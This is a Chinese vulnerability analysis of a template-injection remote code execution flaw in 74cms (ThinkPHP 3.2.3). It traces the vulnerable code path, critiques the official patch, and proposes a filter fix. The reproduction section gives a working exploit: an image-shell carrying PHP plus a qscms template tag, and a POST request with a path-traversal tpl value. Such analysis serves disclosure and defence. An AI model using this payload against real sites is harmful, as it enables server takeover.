0x00 前言
续师傅前些天跟我说骑士 CMS 更新了一个补丁,assign_resume_tpl这个全局函数出现了问题,让我分析看看,我看了下官网公告:
http://www.74cms.com/news/show-2497.html
/Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函数因为过滤不严格,导致了模板注入,可以进行远程命令执行。
0x01 知识背景
骑士 CMS 采用的同样是 Thinkphp 框架,不过其版本是 3.2.3,我们知道 3.2.3 的标准 URL 路径如下:
http://serverName/index.php/模块/控制器/操作但骑士 CMS 采用的是普通模式,即传统的GET传参方式来指定当前访问的模块和操作,举个简单的例子,如果我们想要调用 Home 模块下的 User 控制器中的 login 方法如下:
http://localhost/?m=home&c=user&a=login&var=valuem参数表示模块,c参数表示控制器,a参数表示操作/方法,后面的表示其他GET参数
当然,这些参数是可以改变的,如在系统配置中设置如下:
'VAR_MODULE' => 'module', // 默认模块获取变量 'VAR_CONTROLLER' => 'controller', // 默认控制器获取变量 'VAR_ACTION' => 'action', // 默认操作获取变量
那么刚才的地址就变成了:
http://localhost/?module=home&controller=user&action=login&var=value知道这些那么这个漏洞就很清楚应该如何构造了
0x02 漏洞分析
漏洞文件:/Application/Common/Controller/BaseController.class.php中的assign_resume_tpl方法:
public function assign_resume_tpl($variable,$tpl){ foreach ($variable as $key => $value) { $this->assign($key,$value); } return $this->fetch($tpl); }
传入两个变量,其中$tpl变量被传到fetch()方法中,跟进该方法
/ThinkPHP/Library/Think/View.class.php
public function fetch($templateFile='',$content='',$prefix='') { if(empty($content)) { $templateFile = $this->parseTemplate($templateFile); // 模板文件不存在直接返回 if(!is_file($templateFile)) E(L('_TEMPLATE_NOT_EXIST_').':'.$templateFile); }else{ defined('THEME_PATH') or define('THEME_PATH', $this->getThemePath()); } // 页面缓存 ob_start(); ob_implicit_flush(0); if('php' == strtolower(C('TMPL_ENGINE_TYPE'))) { // 使用PHP原生模板 $_content = $content; // 模板阵列变量分解成为独立变量 extract($this->tVar, EXTR_OVERWRITE); // 直接载入PHP模板 empty($_content)?include $templateFile:eval('?>'.$_content); }else{ // 视图解析标签 $params = array('var'=>$this->tVar,'file'=>$templateFile,'content'=>$content,'prefix'=>$prefix); Hook::listen('view_parse',$params); } // 获取并清空缓存 $content = ob_get_clean(); // 内容过滤标签 Hook::listen('view_filter',$content); // 输出模板文件 return $content; }
首先判断传入的模板文件是否为空,如果不为空,那么继续判断是否使用了PHP原生模板,我们查看配置文件:/ThinkPHP/Conf/convention.php 大概111 行:
'TMPL_ENGINE_TYPE' => 'Think', // 默认模板引擎 以下设置仅对使用Think模板引擎有效 'TMPL_CACHFILE_SUFFIX' => '.php', // 默认模板缓存后缀 'TMPL_DENY_FUNC_LIST' => 'echo,exit', // 模板引擎禁用函数 'TMPL_DENY_PHP' => false, // 默认模板引擎是否禁用PHP原生代码
可以看到骑士 CMS 默认启用的是Think模板,因此判断就进入了
$params = array('var'=>$this->tVar,'file'=>$templateFile,'content'=>$content,'prefix'=>$prefix); Hook::listen('view_parse',$params);
将值带入数组,并传入Hook::listen(),并解析view_parse标签,继续跟进/ThinkPHP/Library/Think/Hook.class.php,大概 80 行:
/** * 监听标签的插件 * @param string $tag 标签名称 * @param mixed $params 传入参数 * @return void */ static public function listen($tag, &$params=NULL) { if(isset(self::$tags[$tag])) { if(APP_DEBUG) { G($tag.'Start'); trace('[ '.$tag.' ] --START--','','INFO'); } foreach (self::$tags[$tag] as $name) { APP_DEBUG && G($name.'_start'); $result = self::exec($name, $tag,$params); if(APP_DEBUG){ G($name.'_end'); trace('Run '.$name.' [ RunTime:'.G($name.'_start',$name.'_end',6).'s ]','','INFO'); } if(false === $result) { // 如果返回false 则中断插件执行 return ; } } if(APP_DEBUG) { // 记录行为的执行日志 trace('[ '.$tag.' ] --END-- [ RunTime:'.G($tag.'Start',$tag.'End',6).'s ]','','INFO'); } } return; } /** * 执行某个插件 * @param string $name 插件名称 * @param string $tag 方法名(标签名) * @param Mixed $params 传入的参数 * @return void */ static public function exec($name, $tag,&$params=NULL) { if('Behavior' == substr($name,-8) ){ // 行为扩展必须用run入口方法 $tag = 'run'; } $addon = new $name(); return $addon->$tag($params); }
也就是说当系统触发了view_parse事件,ThinkPHP会找到Hook::listen()方法,该方法会查找$tags中有没有绑定view_parse事件的方法,然后用foreach遍历$tags属性,并执行Hook:exec方法。
Hook:exec方法会检查行为名称,如果包含Behavior关键字,那么入口方法必须为run方法,而执行run方法的参数在调用Hook::listen时指定。 Hook的配置写在/ThinkPHP/Mode/common.php中,如下:
// 行为扩展定义 'tags' => array( 'app_init' => array( 'Behavior\BuildLiteBehavior', // 生成运行Lite文件 ), 'app_begin' => array( 'Behavior\ReadHtmlCacheBehavior', // 读取静态缓存 ), 'app_end' => array( 'Behavior\ShowPageTraceBehavior', // 页面Trace显示 ), 'view_parse' => array( 'Behavior\ParseTemplateBehavior', // 模板解析 支持PHP、内置模板引擎和第三方模板引擎 ), 'template_filter'=> array( 'Behavior\ContentReplaceBehavior', // 模板输出替换 ), 'view_filter' => array( 'Behavior\WriteHtmlCacheBehavior', // 写入静态缓存 ), ),
从配置文件可以看到view_parse标签执行了ParseTemplateBehavior这个类,因为所有行为扩展的入口都是run方法,所以我们只需要看run方法实现即可,/ThinkPHP/Library/Behavior/ParseTemplateBehavior.class.php17 行左右:
class ParseTemplateBehavior { // 行为扩展的执行入口必须是run public function run(&$_data){ $engine = strtolower(C('TMPL_ENGINE_TYPE')); $_content = empty($_data['content'])?$_data['file']:$_data['content']; $_data['prefix'] = !empty($_data['prefix'])?$_data['prefix']:C('TMPL_CACHE_PREFIX'); if('think'==$engine){ // 采用Think模板引擎 if((!empty($_data['content']) && $this->checkContentCache($_data['content'],$_data['prefix'])) || $this->checkCache($_data['file'],$_data['prefix'])) { // 缓存有效 //载入模版缓存文件 Storage::load(C('CACHE_PATH').$_data['prefix'].md5($_content).C('TMPL_CACHFILE_SUFFIX'),$_data['var']); }else{ $tpl = Think::instance('Think\\Template'); // 编译并加载模板文件 $tpl->fetch($_content,$_data['var'],$_data['prefix']); } }else{ // 调用第三方模板引擎解析和输出 if(strpos($engine,'\\')){ $class = $engine; }else{ $class = 'Think\\Template\\Driver\\'.ucwords($engine); } if(class_exists($class)) { $tpl = new $class; $tpl->fetch($_content,$_data['var']); }else { // 类没有定义 E(L('_NOT_SUPPORT_').': ' . $class); } } }
从代码中知道第一次解析模板时(即模板文件没有缓存),调用了fetch()方法:
$tpl = Think::instance('Think\\Template'); // 编译并加载模板文件 $tpl->fetch($_content,$_data['var'],$_data['prefix']);
跟进文件/ThinkPHP/Library/Think/Template.class.php73 行左右:
/** * 加载模板 * @access public * @param string $templateFile 模板文件 * @param array $templateVar 模板变量 * @param string $prefix 模板标识前缀 * @return void */ public function fetch($templateFile,$templateVar,$prefix='') { $this->tVar = $templateVar; $templateCacheFile = $this->loadTemplate($templateFile,$prefix); Storage::load($templateCacheFile,$this->tVar,null,'tpl'); } /** * 加载主模板并缓存 * @access public * @param string $templateFile 模板文件 * @param string $prefix 模板标识前缀 * @return string * @throws ThinkExecption */ public function loadTemplate ($templateFile,$prefix='') { if(is_file($templateFile)) { $this->templateFile = $templateFile; // 读取模板文件内容 $tmplContent = file_get_contents($templateFile); }else{ $tmplContent = $templateFile; } // 根据模版文件名定位缓存文件 $tmplCacheFile = $this->config['cache_path'].$prefix.md5($templateFile).$this->config['cache_suffix']; // 判断是否启用布局 if(C('LAYOUT_ON')) { if(false !== strpos($tmplContent,'{__NOLAYOUT__}')) { // 可以单独定义不使用布局 $tmplContent = str_replace('{__NOLAYOUT__}','',$tmplContent); }else{ // 替换布局的主体内容 $layoutFile = THEME_PATH.C('LAYOUT_NAME').$this->config['template_suffix']; // 检查布局文件 if(!is_file($layoutFile)) { E(L('_TEMPLATE_NOT_EXIST_').':'.$layoutFile); } $tmplContent = str_replace($this->config['layout_item'],$tmplContent,file_get_contents($layoutFile)); } } // 编译模板内容 $tmplContent = $this->compiler($tmplContent); Storage::put($tmplCacheFile,trim($tmplContent),'tpl'); return $tmplCacheFile; }
可以看到fetch()方法调用了loadTemplate方法,然后在loadTemplate方法中,$templateFile被赋值给了$tmplContent,然后在编译模板内容时,进入了compiler方法,依旧是/ThinkPHP/Library/Think/Template.class.php文件,在120 行左右:
/** * 编译模板文件内容 * @access protected * @param mixed $tmplContent 模板内容 * @return string */ protected function compiler($tmplContent) { //模板解析 $tmplContent = $this->parse($tmplContent); // 还原被替换的Literal标签 $tmplContent = preg_replace_callback('/<!--###literal(\d+)###-->/is', array($this, 'restoreLiteral'), $tmplContent); // 添加安全代码 $tmplContent = '<?php if (!defined(\'THINK_PATH\')) exit();?>'.$tmplContent; // 优化生成的php代码 $tmplContent = str_replace('?><?php','',$tmplContent); // 模版编译过滤标签 Hook::listen('template_filter',$tmplContent); return strip_whitespace($tmplContent);//strip_whitespace函数主要是去除代码中的空白和注释 }
传入的模板内容未经过过滤就直接被拼接到$tmplContent变量
然后返回loadTemplate方法,看其编辑模板的逻辑:
// 编译模板内容 $tmplContent = $this->compiler($tmplContent); Storage::put($tmplCacheFile,trim($tmplContent),'tpl'); return $tmplCacheFile;
将编译好的模板进行缓存处理,然后返回缓存的文件名
返回到fetch()方法,可以看到loadTemplate方法返回的缓存文件名进入了
Storage::load($templateCacheFile,$this->tVar,null,'tpl');
跟进该方法,在/ThinkPHP/Library/Think/Storage/Driver/File.class.php,69 行左右:
/** * 加载文件 * @access public * @param string $filename 文件名 * @param array $vars 传入变量 * @return void */ public function load($_filename,$vars=null){ if(!is_null($vars)){ extract($vars, EXTR_OVERWRITE); } include $_filename; }
进行非空判断后,直接进行了文件包含。
这样一来整个漏洞的流程就很清楚了,流程图如下所示:
0x03 漏洞复现
首先在前台注册一个普通用户,然后更新简历:
完成简历更新后,上传照片:
在上传图片马后,会生成图片地址:
复制路径,通过 a 方法调用assign_resume_tpl函数,再通过 POST 的方式提交该路径,即可包含成功
http://192.168.159.208/index.php?m=home&a=assign_resume_tpl
POST:
variable=1&tpl=../../../../var/www/html/data/upload/resume_img/2011/13/5fae95e469e05.jpg如下图所示:
值得一提的是,通过上面的分析我们可以知道,在解析模板的时候,不是解析原生的 PHP 代码,因此如果图片马是纯 PHP 代码是无法利用成功的,必须要包括骑士 CMS 模板文件的标签,我们可以随便打开一个原有模板,然后复制一句话即可,如:/Application/Home/View/tpl_company/default/com_jobs_list.html
<qscms:company_show 列表名="info" 企业id="$_GET['id']"/>
因此最终的图片马所要包含的内容应该是:
<?php phpinfo(); ?> <qscms:company_show 列表名="info" 企业id="$_GET['id']"/>
另外一点,骑士 CMS 对于图片上传是有过滤的,所以需要绕过技巧,具体可以自行研究,当然你也可以考虑上传 docx 或者其他类型的文件,对于包含的结果是没有影响的
0x04 漏洞修复
官方虽然给了修复的方法,如下:
BaseController.class.php文件中169行assign_resume_tpl方法中添加判断
$view = new \Think\View; $tpl_file = $view->parseTemplate($tpl); if(!is_file($tpl_file)){ return false; }
文件2
路径:/ThinkPHP/Library/Think/View.class.php, View.class.php文件中106行fetch方法中修改,将110行
if(!is_file($templateFile)) E(L('_TEMPLATE_NOT_EXIST_').':'.$templateFile);
代码注释替换为
if(!is_file($templateFile)) E(L('_TEMPLATE_NOT_EXIST_'))
但其实这种修复方式是没有用的,我们依旧可以执行命令,如下图所示:
这里提供一个个人的临时修复方案:
BaseController.class.php文件中assign_resume_tpl方法中添加判断
$pattern = "\.\/|\.\.\/|:|%00|%0a|=|~|@|file|php|filter|resource"; if(preg_match("/".$pattern."/is",$tpl)== 1){ return $this->_empty(); }
如下所示:
在此执行命令时,发现已经失败了:
0x05 总结
本漏洞其实也是寻常的模板注入漏洞,由可控参数传入fetch()函数,这个漏洞产生的方式相信很多人已经很熟悉了,前段时间分析的 fastadmin 前台 RCE 也是由这个原因,但上次偷懒没有分析具体传入的流程,本次分析的比较具体,有不足或错误之处希望师傅们指出,共同学习。最后感谢续师傅的指点(抱大腿)
0x06 参考
https://blog.csdn.net/qq_16877261/article/details/53484671
https://juejin.im/post/6844903982905688078
http://www.111com.net/phper/thinkPhp/104435.htm
如有侵权请联系:admin#unsafe.sh